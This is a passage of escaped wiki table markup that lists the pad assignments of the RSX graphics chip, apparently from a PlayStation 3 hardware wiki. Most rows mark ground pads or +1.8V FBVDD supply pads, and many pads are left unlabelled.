style=&quot;color:white; background-color:#ff3333;&quot; | MPLL0_VDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_PLL_VDD<br /> |-<br /> | B34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | B40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | C<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | C1 || || <br /> |-<br /> | C2 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C3 || || <br /> |-<br /> | C4 || || <br /> |-<br /> | C5 || || <br /> |-<br /> | C6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C7 || || <br /> |-<br /> | C8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C9 || || <br /> |-<br /> | C10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C11 || || <br /> |-<br /> | C12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C13 || || <br /> |-<br /> | C14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C15 || || <br /> |-<br /> | C16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C17 || || <br /> |-<br /> | C18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C19 || || <br /> |-<br /> | C20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C21 || || <br /> |-<br /> | C22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C23 || || <br /> |-<br /> | C24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C25 || || <br /> |-<br /> | C26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C27 || || <br /> |-<br /> | C28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C29 || || <br /> |-<br /> | C30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C31 || || <br /> |-<br /> | C32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | C36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | C41 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | D<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | D3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D4 || || <br /> |-<br /> | D5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D6 || || <br /> |-<br /> | D7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D8 || || <br /> |-<br /> | D9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D10 || || <br /> |-<br /> | D11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D12 || || <br /> |-<br /> | D13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D14 || || <br /> |-<br /> | D15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D16 || || <br /> |-<br /> | D17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D18 || || <br /> |-<br /> | D19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D20 || || <br /> |-<br /> | D21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D22 || || <br /> |-<br /> | D23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D24 || || <br /> |-<br /> | D25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D26 || || <br /> |-<br /> | D27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D28 || || <br /> |-<br /> | D29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D30 || || <br /> |-<br /> | D31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D33 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | D38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | D40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | E<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | E1 || || <br /> |-<br /> | E2 || || <br /> |-<br /> | E3 || || <br /> |-<br /> | E4 || || <br /> |-<br /> | E5 || || <br /> |-<br /> | E6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E7 || || <br /> |-<br /> | E8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E9 || || <br /> |-<br /> | E10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E11 || || <br /> |-<br /> | E12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E13 || || <br /> |-<br /> | E14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E15 || || <br /> |-<br /> | E16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E17 || || <br /> |-<br /> | E18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E19 || || <br /> |-<br /> | E20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E21 || || <br /> |-<br /> | E22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E23 || || <br /> |-<br /> | E24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E25 || || <br /> |-<br /> | E26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E27 || || <br /> |-<br /> | E28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E29 || || <br /> |-<br /> | E30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E31 || || <br /> |-<br /> | E32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | E36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | E38 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | E39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | F<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | F3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F4 || || <br /> |-<br /> | F5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F6 || || <br /> |-<br /> | F7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F8 || || <br /> |-<br /> | F9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F10 || || <br /> |-<br /> | F11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F12 || || <br /> |-<br /> | F13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F14 || || <br /> |-<br /> | F15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F16 || || <br /> |-<br /> | F17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F18 || || <br /> |-<br /> | F19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F20 || || <br /> |-<br /> | F21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F22 || || <br /> |-<br /> | F23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F24 || || <br /> |-<br /> | F25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F26 || || <br /> |-<br /> | F27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F28 || || <br /> |-<br /> | F29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F30 || || <br /> |-<br /> | F31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F32 || || <br /> |-<br /> | F33 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | F38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | F41 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | G<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | G1 || || <br /> |-<br /> | G2 || || <br /> |-<br /> | G3 || || <br /> |-<br /> | G4 || || <br /> |-<br /> | G5 || || <br /> |-<br /> | G6 || || <br /> |-<br /> | G7 || || <br /> |-<br /> | G8 || || <br /> |-<br /> | G9 || || <br /> |-<br /> | G10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G11 || || <br /> |-<br /> | G12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G13 || || <br /> |-<br /> | G14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G15 || || <br /> |-<br /> | G16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G17 || || <br /> |-<br /> | G18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G19 || || <br /> |-<br /> | G20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G21 || || <br /> |-<br /> | G22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G23 || || <br /> |-<br /> | G24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G25 || || <br /> |-<br /> | G26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G27 || || <br /> |-<br /> | G28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G29 || || <br /> |-<br /> | G30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | G31 || || <br /> |-<br /> | G32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G35 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | G36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G40 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | G41 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | H<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | H3 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | H4 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H7 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H8 || || <br /> |-<br /> | H9 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H10 || || <br /> |-<br /> | H11 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H12 || || <br /> |-<br /> | H13 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H14 || || <br /> |-<br /> | H15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H16 || || <br /> |-<br /> | H17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H18 || || <br /> |-<br /> | H19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground <br /> |-<br /> | H20 || || <br /> |-<br /> | H21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H22 || || <br /> |-<br /> | H23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H24 || || <br /> |-<br /> | H25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H26 || || <br /> |-<br /> | H27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H28 || || <br /> |-<br /> | H29 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H30 || || <br /> |-<br /> | H31 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H32 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H33 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | H38 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H39 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | H40 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | J<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | J1 || || <br /> |-<br /> | J2 || || <br /> |-<br /> | J3 || || <br /> |-<br /> | J4 || || <br /> |-<br /> | J5 || || <br /> |-<br /> | J6 || || <br /> |-<br /> | J7 || || <br /> |-<br /> | J8 || || <br /> |-<br /> | J9 || || <br /> |-<br /> | J10 || || <br /> |-<br /> | J11 || || <br /> |-<br /> | J12 || || <br /> |-<br /> | J13 || || <br /> |-<br /> | J14 || || <br /> |-<br /> | J15 || || <br /> |-<br /> | J16 || || <br /> |-<br /> | J17 || || <br /> |-<br /> | J18 || || <br /> |-<br /> | J19 || || <br /> |-<br /> | J20 || || <br /> |-<br /> | J21 || || <br /> |-<br /> | J22 || || <br /> |-<br /> | J23 || || <br /> |-<br /> | J24 || || <br /> |-<br /> | J25 || || <br /> |-<br /> | J26 || || <br /> |-<br /> | J27 || || <br /> |-<br /> | J28 || || <br /> |-<br /> | J29 || || <br /> |-<br /> | J30 || || <br /> |-<br /> | J31 || || <br /> |-<br /> | J32 || || <br /> |-<br /> | J33 || || <br /> |-<br /> | J34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J35 || || <br /> |-<br /> | J36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | J38 || || <br /> |-<br /> | J39 || || <br /> |-<br /> | J40 || || <br /> |-<br /> | J41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | K<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | K3 || || <br /> |-<br /> | K4 || || <br /> |-<br /> | K5 || || <br /> |-<br /> | K6 || || <br /> |-<br /> | K7 || || <br /> |-<br /> | K8 || || <br /> |-<br /> | K13 || || <br /> |-<br /> | K14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K15 || || <br /> |-<br /> | K16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K17 || || <br /> |-<br /> | K18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K19 || || <br /> |-<br /> | K20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K21 || || <br /> |-<br /> | K22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K23 || || <br /> |-<br /> | K24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K25 || || <br /> |-<br /> | K26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K27 || || <br /> |-<br /> | K28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K29 || || <br /> |-<br /> | K34 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | K35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | K36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | K37 || FB_MF1 || &amp;gt; Ground <br /> |-<br /> | K38 || FB_SEN1 || &amp;gt; Ground<br /> |-<br /> | K39 || || <br /> |-<br /> | K40 || || <br /> |-<br /> | K41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | L<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | L1 || || <br /> |-<br /> | L2 || || <br /> |-<br /> | 